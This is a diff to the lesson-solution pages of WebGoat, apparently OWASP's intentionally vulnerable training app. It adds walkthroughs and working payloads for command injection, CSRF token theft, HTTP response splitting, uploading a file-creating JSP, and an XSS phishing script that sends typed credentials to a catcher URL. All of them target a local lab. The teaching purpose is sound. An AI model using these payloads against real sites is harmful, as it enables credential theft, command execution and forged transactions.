+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution: Bypass HTML Field Restrictions</title>
+<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> Bypass HTML Field Restrictions</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+Client-side validation should not be considered a secure means of validating parameters. These validations only help reduce the amount of server processing time for normal users who do not know the format of required input. Attackers can bypass these mechanisms easily in various ways. Any client-side validation should be duplicated on the server side. This will greatly reduce the likelihood of insecure parameter values being used in the application
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+The user should be able send the website input that it wasn't expecting.<br/>
+For this exercise, your job is to break the client side validation and send the website input that it wasn't expecting, including input for the disabled field. <b>You must break all 6 validators at the same time</b>. 
+</p>
+
+<b>Solution:</b><br/><br/>
+To solve this lesson, we need to put invalid characters (slashes, quotes, etc.) into all six fields. Since three of the fields are toggles or dropdowns, we will need to intercept the request with Webscarab.<br/>
+We still need to put invalid data in the disabled field, however. There are two ways of accomplishing this; we can enable the field using Firebug, or we can insert an additional field using Webscarab.<br/><br/>
+
+To enable the field, open Firebug and find the form containing all of our fields. Find the text input named &quot;disabledinput&quot;. Delete the <b>disabled=&quot;&quot;</b> parameter. This causes the field on the page to be unlocked, and will also cause the disabledinput variable to appear in Webscarab.<br/>
+<img src="lesson_solutions/BypassHtmlFieldRestrictions_files/image001.jpg"><br/>
+<font size="2"><b>Enabled input after removing the &quot;disabled&quot; parameter in Firebug.</b></font><br/><br/>
+The other option is to add another variable when intercepting the request with Webscarab. When the intercept request window pops up, use the insert button to add a new variable called <b>disabledinput</b>.<br/><br/>
+Either way you add the input, the next step is to invalidate all of the responses. Put any symbol or character that isn't allowed in for each variable. Make sure you put more than five characters in the field that is limited by length.<br/>
+
+<img src="lesson_solutions/BypassHtmlFieldRestrictions_files/image002.jpg"><br/>
+<font size="2"><b>Correctly filled in request with all fields invalidated and the disabledinput variable added.</b></font><br/><br/>
+
+Submit the request to complete the lesson.
+<br/>
+
+</body>
+</html>
\ No newline at end of file
diff --git a/webgoat/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image001.jpg b/webgoat/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image001.jpg
new file mode 100644
index 000000000..b7b54355c
Binary files /dev/null and b/webgoat/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image001.jpg differ
diff --git a/webgoat/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image002.jpg b/webgoat/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image002.jpg
new file mode 100644
index 000000000..716f2aad9
Binary files /dev/null and b/webgoat/src/main/webapp/lesson_solutions/BypassHtmlFieldRestrictions_files/image002.jpg differ
diff --git a/webgoat/src/main/webapp/lesson_solutions/CSRF.html b/webgoat/src/main/webapp/lesson_solutions/CSRF.html
index f94cc3201..db3af3e8b 100644
--- a/webgoat/src/main/webapp/lesson_solutions/CSRF.html
+++ b/webgoat/src/main/webapp/lesson_solutions/CSRF.html
@@ -690,7 +690,8 @@ a URL. The URL should point to the CSRF lesson with an extra parameter
 menu by right clicking on the left hand menu and choosing copy shortcut.
 Whoever receives this email and happens to be authenticated at that time will
 have his funds transferred. When you think the attack is successful, refresh
-the page and you will find the green check on the left hand side menu.<o:p></o:p></span></p>
+the page and you will find the green check on the left hand side menu.<br/>
+<b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b><o:p></o:p></span></p>
 
 <p class=MsoNormal style='text-align:justify'><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
diff --git a/webgoat/src/main/webapp/lesson_solutions/ClientSideFiltering.html b/webgoat/src/main/webapp/lesson_solutions/ClientSideFiltering.html
index 61d163fc2..fe08a4bdf 100644
--- a/webgoat/src/main/webapp/lesson_solutions/ClientSideFiltering.html
+++ b/webgoat/src/main/webapp/lesson_solutions/ClientSideFiltering.html
@@ -68,11 +68,11 @@ filters in XPath. Following code will exactly do this:</p>
 <code>
 	StringBuffer sb = new StringBuffer();<br>
 	
-	sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/UserID | ");<br>
-	sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/FirstName | ");<br>
-	sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/LastName | ");<br>
-	sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/SSN | ");<br>
-	sb.append("/Employees/Employee[Managers/Manager/text() = " + userid + "]/Salary ");<br>
+	sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/UserID | ");<br>
+	sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/FirstName | ");<br>
+	sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/LastName | ");<br>
+	sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/SSN | ");<br>
+	sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/Salary ");<br>
 	
 	String expression = sb.toString();<br>
 </code>
diff --git a/webgoat/src/main/webapp/lesson_solutions/CommandInjection.html b/webgoat/src/main/webapp/lesson_solutions/CommandInjection.html
index 00ca072c1..7e19dd78a 100644
--- a/webgoat/src/main/webapp/lesson_solutions/CommandInjection.html
+++ b/webgoat/src/main/webapp/lesson_solutions/CommandInjection.html
@@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
 <meta name=ProgId content=Word.Document>
 <meta name=Generator content="Microsoft Word 12">
 <meta name=Originator content="Microsoft Word 12">
+<title>Solution: Command Injection</title>
 <link rel=File-List href="lesson_solutions/CommandInjection_files/filelist.xml">
 <link rel=Edit-Time-Data href="lesson_solutions/CommandInjection_files/editdata.mso">
 <!--[if !mso]>
@@ -678,8 +679,8 @@ style='font-family:"Arial","sans-serif"'><o:p></o:p></span></p>
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
 <p><span style='font-family:"Arial","sans-serif"'>Intercept the
-request with WebScarab when you click on "View". Append " &amp; netstat &minus;an
-&amp; ipconfig"to the HelpFile parameter. Do not forget the double quote!<o:p></o:p></span></p>
+request with WebScarab when you click on "View". Append <b>" &amp; netstat -an
+&amp; ipconfig</b> to the HelpFile parameter. Do not forget the double quote!<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
diff --git a/webgoat/src/main/webapp/lesson_solutions/CsrfPromptByPass.html b/webgoat/src/main/webapp/lesson_solutions/CsrfPromptByPass.html
index 6faed2817..caeeedb03 100644
--- a/webgoat/src/main/webapp/lesson_solutions/CsrfPromptByPass.html
+++ b/webgoat/src/main/webapp/lesson_solutions/CsrfPromptByPass.html
@@ -16,12 +16,13 @@ multiple requests to by-pass a scriptable user-prompt
 <p><b>General Goal(s):</b><br/>
 Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains multiple 
 malicious requests: the first to transfer funds, and the second a request to confirm the prompt 
-that the first request triggered.  The URL should point to the CSRF lesson with an extra 
+that the first request triggered.  The URL should point to this lesson with an extra 
 parameter "transferFunds=4000", and "transferFunds=CONFIRM". You can copy the shortcut from the 
 left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever 
 receives this email and happens to be authenticated at that time will have his funds transferred. 
 When you think the attack is successful, refresh the page and you will find the green check on 
-the left hand side menu
+the left hand side menu<br/>
+<b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b>
 </p>
 
 <b>Solution:</b><br/>
diff --git a/webgoat/src/main/webapp/lesson_solutions/CsrfTokenByPass.html b/webgoat/src/main/webapp/lesson_solutions/CsrfTokenByPass.html
index d4e4c7bd3..769ee1c6b 100644
--- a/webgoat/src/main/webapp/lesson_solutions/CsrfTokenByPass.html
+++ b/webgoat/src/main/webapp/lesson_solutions/CsrfTokenByPass.html
@@ -32,7 +32,8 @@ request to transfer funds.  To successfully complete you need to obtain a valid
 URL that presents the transfer funds form is the same as the CSRF lesson with an extra parameter 
 "transferFunds=main".  Load this page, read the token and append the token in a forged request 
 to transferFunds. When you think the attack is successful, refresh the page and you will find the 
-green check on the left hand side menu.
+green check on the left hand side menu.<br/>
+<b>Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.</b>
 </p>
 
 <b>Solution:</b><br/>
@@ -70,7 +71,7 @@ var tokenvalue;
 function readFrame1()
 {
     var frameDoc = document.getElementById("frame1").contentDocument;
-    var form = frameDoc.getElementsByTagName("Form")[0];
+    var form = frameDoc.getElementsByTagName("form")[1];
     var token = form.CSRFToken.value;
     tokenvalue = '&CSRFToken='+token;
     
@@ -80,7 +81,7 @@ function readFrame1()
 function loadFrame2()
 {
     var testFrame = document.getElementById("frame2");
-    testFrame.src="http://localhost:8080/WebGoat/attack?Screen=212&menu=900&transferFunds=4000"+tokenvalue;	
+    testFrame.src="http://localhost:8080/webgoat/attack?Screen=212&menu=900&transferFunds=4000"+tokenvalue;	
 }
 </pre></code>
 
@@ -94,7 +95,7 @@ call readFrame1, which calls loadFrame2, which then sets the src for the second
 
 
 <code>
-<pre id="line585">&lt;<span class="start-tag">iframe</span><span class="attribute-name">	src</span>=<span class="attribute-value">"http://localhost:8080/WebGoat/attack?Screen=212&amp;menu=900&amp;transferFunds=main"
+<pre id="line585">&lt;<span class="start-tag">iframe</span><span class="attribute-name">	src</span>=<span class="attribute-value">"http://localhost:8080/webgoat/attack?Screen=212&amp;menu=900&amp;transferFunds=main"
 	</span><span class="attribute-name">onload</span>=<span class="attribute-value">"readFrame1();"
 	</span><span class="attribute-name">id</span>=<span class="attribute-value">"frame1" </span><span class="attribute-name">frameborder</span>=<span class="attribute-value">"1" </span><span class="attribute-name">marginwidth</span>=<span class="attribute-value">"0"
 	</span><span class="attribute-name">marginheight</span>=<span class="attribute-value">"0" </span><span class="attribute-name">width</span>=<span class="attribute-value">"800" </span><span class="attribute-name">scrolling</span>=<span class="attribute-value">yes </span><span class="attribute-name">height</span>=<span class="attribute-value">"300"</span>&gt;&lt;/<span class="end-tag">iframe</span>&gt;
diff --git a/webgoat/src/main/webapp/lesson_solutions/DOMInjection.html b/webgoat/src/main/webapp/lesson_solutions/DOMInjection.html
index 8a3982a6d..1e73150f0 100644
--- a/webgoat/src/main/webapp/lesson_solutions/DOMInjection.html
+++ b/webgoat/src/main/webapp/lesson_solutions/DOMInjection.html
@@ -794,7 +794,7 @@ field-end'></span><![endif]--> HTTP Response</p>
 <p class=MsoNormal><o:p>&nbsp;</o:p></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Intercept the
-reply and replace the body with document.forms[0].SUBMIT.disabled = false;<o:p></o:p></span></p>
+reply and replace the body with document.form.SUBMIT.disabled = false;<o:p></o:p></span></p>
 
 <p class=MsoNormal><span style='font-family:"Arial","sans-serif"'><o:p>&nbsp;</o:p></span></p>
 
@@ -804,7 +804,7 @@ reply and replace the body with document.forms[0].SUBMIT.disabled = false;<o:p><
  visibility:visible;mso-wrap-style:square'>
  <v:imagedata src="lesson_solutions/DOMInjection_files/image007.png" o:title=""/>
 </v:shape><![endif]--><![if !vml]><img width=642 height=460
-src="lesson_solutions/DOMInjection_files/image008.jpg" v:shapes="Picture_x0020_52"><![endif]></span></p>
+src="lesson_solutions/DOMInjection_files/image008fix.jpg" v:shapes="Picture_x0020_52"><![endif]></span></p>
 
 <p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
 field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
diff --git a/webgoat/src/main/webapp/lesson_solutions/DOMInjection_files/image008fix.jpg b/webgoat/src/main/webapp/lesson_solutions/DOMInjection_files/image008fix.jpg
new file mode 100644
index 000000000..1112e63f7
Binary files /dev/null and b/webgoat/src/main/webapp/lesson_solutions/DOMInjection_files/image008fix.jpg differ
diff --git a/webgoat/src/main/webapp/lesson_solutions/DOMXSS_files/Thumbs.db b/webgoat/src/main/webapp/lesson_solutions/DOMXSS_files/Thumbs.db
new file mode 100644
index 000000000..550da4fb2
Binary files /dev/null and b/webgoat/src/main/webapp/lesson_solutions/DOMXSS_files/Thumbs.db differ
diff --git a/webgoat/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/Thumbs.db b/webgoat/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/Thumbs.db
new file mode 100644
index 000000000..ccd50130d
Binary files /dev/null and b/webgoat/src/main/webapp/lesson_solutions/HiddenFieldTampering_files/Thumbs.db differ
diff --git a/webgoat/src/main/webapp/lesson_solutions/HttpBasics.html b/webgoat/src/main/webapp/lesson_solutions/HttpBasics.html
index 8b0f542c7..73bfee09b 100644
--- a/webgoat/src/main/webapp/lesson_solutions/HttpBasics.html
+++ b/webgoat/src/main/webapp/lesson_solutions/HttpBasics.html
@@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
 <meta name=ProgId content=Word.Document>
 <meta name=Generator content="Microsoft Word 12">
 <meta name=Originator content="Microsoft Word 12">
+<title>Solution: Http Basics</title>
 <link rel=File-List href="lesson_solutions/HttpBasics_files/filelist.xml">
 <link rel=Edit-Time-Data href="lesson_solutions/HttpBasics_files/editdata.mso">
 <!--[if !mso]>
diff --git a/webgoat/src/main/webapp/lesson_solutions/HttpSplitting.html b/webgoat/src/main/webapp/lesson_solutions/HttpSplitting.html
index 106ea6097..68e0b687d 100644
--- a/webgoat/src/main/webapp/lesson_solutions/HttpSplitting.html
+++ b/webgoat/src/main/webapp/lesson_solutions/HttpSplitting.html
@@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
 <meta name=ProgId content=Word.Document>
 <meta name=Generator content="Microsoft Word 12">
 <meta name=Originator content="Microsoft Word 12">
+<title>Solution: Http Splitting and Cache Poisoning </title>
 <link rel=File-List href="lesson_solutions/HttpSplitting_files/filelist.xml">
 <link rel=Edit-Time-Data href="lesson_solutions/HttpSplitting_files/editdata.mso">
 <!--[if !mso]>
@@ -979,7 +980,7 @@ attack.<o:p></o:p></span></p>
 poisoning requires manipulating the Last-Modified header. This must be changed
 to a date in the future.<o:p></o:p></span></p>
 
-<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Inject: foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Hacked
+<p class=MsoNormal><span style='font-family:"Arial","sans-serif"'>Inject: foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202060%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a&lt;html&gt;Hacked
 </span><span style='font-family:Wingdings;mso-ascii-font-family:Arial;
 mso-hansi-font-family:Arial;mso-bidi-font-family:Arial;mso-char-type:symbol;
 mso-symbol-font-family:Wingdings'><span style='mso-char-type:symbol;mso-symbol-font-family:
diff --git a/webgoat/src/main/webapp/lesson_solutions/JSONInjection.html b/webgoat/src/main/webapp/lesson_solutions/JSONInjection.html
index 55356da79..a78a84d25 100644
--- a/webgoat/src/main/webapp/lesson_solutions/JSONInjection.html
+++ b/webgoat/src/main/webapp/lesson_solutions/JSONInjection.html
@@ -9,6 +9,7 @@ xmlns="http://www.w3.org/TR/REC-html40">
 <meta name=ProgId content=Word.Document>
 <meta name=Generator content="Microsoft Word 12">
 <meta name=Originator content="Microsoft Word 12">
+<title>Solution: JSON Injection</title>
 <link rel=File-List href="lesson_solutions/JSONInjection_files/filelist.xml">
 <link rel=Edit-Time-Data href="lesson_solutions/JSONInjection_files/editdata.mso">
 <!--[if !mso]>
diff --git a/webgoat/src/main/webapp/lesson_solutions/Lab Access Control/Lab Add Business Layer Access Control.html b/webgoat/src/main/webapp/lesson_solutions/Lab Access Control/Lab Add Business Layer Access Control.html
index a2c176d73..18aa18be9 100644
--- a/webgoat/src/main/webapp/lesson_solutions/Lab Access Control/Lab Add Business Layer Access Control.html	
+++ b/webgoat/src/main/webapp/lesson_solutions/Lab Access Control/Lab Add Business Layer Access Control.html	
@@ -6,7 +6,7 @@
 <link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
 </head>
 <body>
-<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
+<p><b>Lesson Plan Title:</b> Role Based Access Control: Stage 2</p>
 
 <p><b>Concept / Topic To Teach:</b><br/>
 In role-based access control scheme, a role represents 
@@ -38,7 +38,7 @@ There is already a method called isAuthorized which you can use:
 </p>
 <pre><code>
 //***************CODE HERE*************************
-if(!isAuthorized(s, userId, requestedActionName))
+if(!isAuthorized(s, getUserId(s), requestedActionName))
 {
   throw new UnauthorizedException();
 }									
diff --git a/webgoat/src/main/webapp/lesson_solutions/Lab Access Control/Lab Add Data Layer Access Control.html b/webgoat/src/main/webapp/lesson_solutions/Lab Access Control/Lab Add Data Layer Access Control.html
index 750a6e139..f6ab88361 100644
--- a/webgoat/src/main/webapp/lesson_solutions/Lab Access Control/Lab Add Data Layer Access Control.html	
+++ b/webgoat/src/main/webapp/lesson_solutions/Lab Access Control/Lab Add Data Layer Access Control.html	
@@ -6,7 +6,7 @@
 <link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
 </head>
 <body>
-<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
+<p><b>Lesson Plan Title:</b> Role Based Access Control: Stage 4</p>
 
 <p><b>Concept / Topic To Teach:</b><br/>
 In role-based access control scheme, a role represents 
@@ -39,11 +39,11 @@ Action has already a method called isAuthorizedForEmployee which you can use:
 </p>
 <pre><code>
 //***************CODE HERE*************************
-if(!isAuthorized(s, userId, requestedActionName))
+if(!isAuthorized(s, getUserId(s), requestedActionName))
 {
   throw new UnauthorizedException();
 }
-if(!action.isAuthorizedForEmployee(s, userId, employeeId))
+if(!action.isAuthorizedForEmployee(s, getUserId(s), s.getParser().getIntParameter(RoleBasedAccessControl.EMPLOYEE_ID, 0)))
 {
   throw new UnauthorizedException();
 }						
diff --git a/webgoat/src/main/webapp/lesson_solutions/Lab Access Control/Lab Bypass Business Layer Access Control.html b/webgoat/src/main/webapp/lesson_solutions/Lab Access Control/Lab Bypass Business Layer Access Control.html
index 46f7413fb..004e26185 100644
--- a/webgoat/src/main/webapp/lesson_solutions/Lab Access Control/Lab Bypass Business Layer Access Control.html	
+++ b/webgoat/src/main/webapp/lesson_solutions/Lab Access Control/Lab Bypass Business Layer Access Control.html	
@@ -6,7 +6,7 @@
 <link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
 </head>
 <body>
-<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
+<p><b>Lesson Plan Title:</b> Role Based Access Control: Stage 1</p>
 
 <p><b>Concept / Topic To Teach:</b><br/>
 In role-based access control scheme, a role represents 
diff --git a/webgoat/src/main/webapp/lesson_solutions/Lab Access Control/Lab Bypass Data Layer Access Control.html b/webgoat/src/main/webapp/lesson_solutions/Lab Access Control/Lab Bypass Data Layer Access Control.html
index fe9d868c4..e94e42c45 100644
--- a/webgoat/src/main/webapp/lesson_solutions/Lab Access Control/Lab Bypass Data Layer Access Control.html	
+++ b/webgoat/src/main/webapp/lesson_solutions/Lab Access Control/Lab Bypass Data Layer Access Control.html	
@@ -6,7 +6,7 @@
 <link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
 </head>
 <body>
-<p><b>Lesson Plan Title:</b> How to Perform Cross Site Scripting (XSS)</p>
+<p><b>Lesson Plan Title:</b> Role Based Access Control: Stage 3</p>
 
 <p><b>Concept / Topic To Teach:</b><br/>
 In role-based access control scheme, a role represents 
diff --git a/webgoat/src/main/webapp/lesson_solutions/Lab XSS/Lab Block Stored XSS using Output Encoding.html b/webgoat/src/main/webapp/lesson_solutions/Lab XSS/Lab Block Stored XSS using Output Encoding.html
index a8b5e7bb4..52a4b3283 100644
--- a/webgoat/src/main/webapp/lesson_solutions/Lab XSS/Lab Block Stored XSS using Output Encoding.html	
+++ b/webgoat/src/main/webapp/lesson_solutions/Lab XSS/Lab Block Stored XSS using Output Encoding.html	
@@ -19,7 +19,7 @@ For this exercise, you will perform stored and reflected XSS attacks. You will a
 
 <p><b>Solution:</b><br/>
 You have to use a static method called encode(String s) which is part of the class org.owasp.webgoat.util.HtmlEncoder.
-<p>This method changes all special characters in the string. Now you have to use this method in the getEmployeeProfile method in the org.owasp.webgoat.lessons.CrossSiteScripting class. 
+<p>This method changes all special characters in the string. Now you have to use this method in the getEmployeeProfile method in the org.owasp.webgoat.lessons.CrossSiteScripting.ViewProfile class. 
 Replace all answer_results.getString(someString) with HtmlEncoder.encode(answer_results.getString(someString)) and you are done.</p>
 
 </body>
diff --git a/webgoat/src/main/webapp/lesson_solutions/MaliciousFileExecution.html b/webgoat/src/main/webapp/lesson_solutions/MaliciousFileExecution.html
new file mode 100644
index 000000000..1578e84b2
--- /dev/null
+++ b/webgoat/src/main/webapp/lesson_solutions/MaliciousFileExecution.html
@@ -0,0 +1,46 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution: Malicious File Execution</title>
+<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> Malicious File Execution</p>
+
+<p><b>Concept / Topic To Teach:</b><br/>
+Many sites allow the user to upload files, such as images or videos. Without the proper security, files containing malicious commands can be and then executed on the server.
+</p> 
+
+<p><b>General Goal(s):</b><br/>
+The form below allows you to upload an image which will be displayed on this page. Features like this are often found on web based discussion boards and social networking sites. This feature is vulnerable to Malicious File Execution.<br/><br/>
+
+In order to pass this lession, upload and run a malicious file. In order to prove that your file can execute, it should create another file named guest.txt<br/><br/>
+
+Once you have created this file, you will pass the lesson.
+</p>
+
+<b>Solution:</b><br/><br/>
+The first step of malicious file execution is to create a file that we can run on the server. In this lesson, our goal is to create the file <b>guest.txt</b> in the directory provided in the lesson (the path is generated based on your system).<br/><br/>
+To do this, we write a .jsp file that uses the java createNewFile() command. The file contents will look like this:<br/>
+
+&lt;HTML&gt;
+&lt;%
+java.io.File file = new java.io.File(&quot;<b>filepath</b>\\guest.txt&quot;);
+file.createNewFile();
+%&gt;
+&lt;/HTML&gt;<br/><br/>
+The <b>&lt;%</b> indicates that the upcoming code is a java servlet, so java code is allowed. Make sure you fill in the filepath correctly - each directory must be separated by <b>\\</b>, not <b>\</b>. The filename of the .jsp doesn't matter, as long as you know what it is.<br/><br/>
+Next, we need to figure out where the files are being uploaded so we can execute them. In this case, since we are shown the image, this is very easy. Upload an image using the form, then right click on it and check its properties.<br/>
+<img src="lesson_solutions/MaliciousFileExecution_files/image001.jpg"><br/>
+<font size="2"><b>Viewing properties of the uploaded image in Firefox.</b></font><br/><br/><br/><br/>
+<img src="lesson_solutions/MaliciousFileExecution_files/image002.jpg"><br/>
+<font size="2"><b>File path for the uploaded image (and our .jsp) in Firefox.</b></font><br/><br/>
+The URL should look something like <b>http://localhost/webgoat/uploads/image.jpg</b>.<br/>
+The last step is to upload our malicious .jsp and browse to it so it will execute. Upload the file, then type its address into your browser. The address should be something like <b>http://localhost/webgoat/uploads/yourfile.jsp</b>.<br/><br/>
+A blank page will load. You can then return to the lesson and refresh, completing the lesson.<br/><br/><br/>
+
+
+
+</body>
+</html>
\ No newline at end of file
diff --git a/webgoat/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image001.jpg b/webgoat/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image001.jpg
new file mode 100644
index 000000000..4c69a2352
Binary files /dev/null and b/webgoat/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image001.jpg differ
diff --git a/webgoat/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image002.jpg b/webgoat/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image002.jpg
new file mode 100644
index 000000000..8a2189e3e
Binary files /dev/null and b/webgoat/src/main/webapp/lesson_solutions/MaliciousFileExecution_files/image002.jpg differ
diff --git a/webgoat/src/main/webapp/lesson_solutions/OffByOne.html b/webgoat/src/main/webapp/lesson_solutions/OffByOne.html
new file mode 100644
index 000000000..0447a1fbc
--- /dev/null
+++ b/webgoat/src/main/webapp/lesson_solutions/OffByOne.html
@@ -0,0 +1,14 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
+<title>Solution: Modify Data with SQL</title>
+<link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
+</head>
+<body>
+<p><b>Lesson Plan Title:</b> Off By One Buffer Overflows</p>
+
+<p>This new lesson does not yet have a detailed solution. If you would like to provide a solution for this lesson, please send an e-mail to <a href="mailto:WebGoat@owasp.org">WebGoat@owasp.org</a>.</p>
+
+</body>
+</html>
\ No newline at end of file
diff --git a/webgoat/src/main/webapp/lesson_solutions/Phishing.html b/webgoat/src/main/webapp/lesson_solutions/Phishing.html
index c1ba6345d..a99b9432e 100644
--- a/webgoat/src/main/webapp/lesson_solutions/Phishing.html
+++ b/webgoat/src/main/webapp/lesson_solutions/Phishing.html
@@ -1,7 +1,7 @@
 <html>
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
-<title>Solution Lab Block Stored XSS</title>
+<title>Phising with XSS</title>
 <link rel="stylesheet" type="text/css" href="lesson_solutions/formate.css">
 </head>
 <body>
@@ -30,38 +30,40 @@ This solution consists of two parts you have to combine:
 </ul>
 A Form with username and password could look like this:<br/>
 <p>
-&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
-&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot;
-name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot;
+&lt;/form&gt;&lt;form name=&quot;phish&quot;&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
+&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot;
 name = &quot;pass&quot;&gt;&lt;br&gt;&lt;/form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;
-<br/><br/>Search for this term and you will see that a form is added to the page.
+<br/><br/>Search for this term and you will see that a form is added to the page since the search field accepts HTML.
+<br/>The initial &lt;/form&gt; tag is to terminate the original search form.
 </p>
 Now you need a script:
 <p>
-&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen."
-User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; +  document.forms[0].pass.value); 
-XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+
-document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}
+&lt;script&gt;function hack(){ XSSImage=new Image; XSSImage.src=&quot;<font color="blue">http://localhost/webgoat/</font>catcher?PROPERTY=yes&amp;user=&quot;+
+document.phish.user.value + &quot;&amp;password=&quot; + document.phish.pass.value + &quot;&quot;; alert(&quot;Had this been a real attack... Your credentials were just stolen.
+User Name = &quot; + document.phish.user.value + &quot;Password = &quot; +  document.phish.pass.value);}
 &lt;/script&gt;
 </p>
 <p>
-This script will read the input from the form and send it to the catcher of WebGoat.<br/><br/>
+This script will read the input from the form and send it to the catcher of WebGoat.<br/>
+The text <font color="blue">in blue</font> should match what is in your address bar. If you are using ports and/or webscarab, it may be different.<br/>
 The last step is to put things together. Add a Button to the form which
-calls the script. You can reach this with the onclick="myFunction" handler.
+calls the script. You can reach this with the onclick="myFunction()" handler:
+</p>
+<p>
+&lt;input type=&quot;submit&quot; name=&quot;login&quot; value=&quot;login&quot; onclick=&quot;hack()&quot;&gt;
 <p>
 The final String looks like this:<br/>
-&lt;script&gt;function hack(){ alert(&quot;Had this been a real attack... Your credentials were just stolen.
-User Name = &quot; + document.forms[0].user.value + &quot;Password = &quot; +  document.forms[0].pass.value); 
-XSSImage=new Image; XSSImage.src=&quot;http://localhost/webgoat/catcher?PROPERTY=yes&amp;user=&quot;+
-document.forms[0].user.value + &quot;&amp;password=&quot; + document.forms[0].pass.value + &quot;&quot;;}
-&lt;/script&gt;&lt;form&gt;&lt;br&gt;&lt;br&gt;&lt;HR&gt;&lt;H3&gt;This feature requires account login:&lt;/H3
-&gt;&lt;br&gt;&lt;br&gt;Enter Username:&lt;br&gt;&lt;input type=&quot;text&quot; id=&quot;user&quot; 
-name=&quot;user&quot;&gt;&lt;br&gt;Enter Password:&lt;br&gt;&lt;input type=&quot;password&quot; 
-name = &quot;pass&quot;&gt;&lt;br&gt;&lt;input type=&quot;submit&quot; name=&quot;login&quot; 
